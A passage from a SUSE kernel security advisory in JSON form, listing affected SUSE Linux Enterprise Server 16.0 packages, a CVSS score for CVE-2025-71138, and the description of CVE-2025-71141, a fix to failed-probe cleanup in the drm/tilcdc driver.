"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-71138"
},
{
"cve": "CVE-2025-71141",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71141"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/tilcdc: Fix removal actions in case of failed probe\n\nThe drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers\nshould only be called when the device has been successfully registered.\nCurrently, these functions are called unconditionally in tilcdc_fini(),\nwhich causes warnings during probe deferral scenarios.\n\n[ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68\n...\n[ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108\n[ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8\n[ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144\n[ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc]\n[ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc]\n\nFix this by rewriting the failed probe cleanup path using the standard\ngoto error handling pattern, which ensures that cleanup functions are\nonly called on successfully initialized resources. Additionally, remove\nthe now-unnecessary is_registered flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
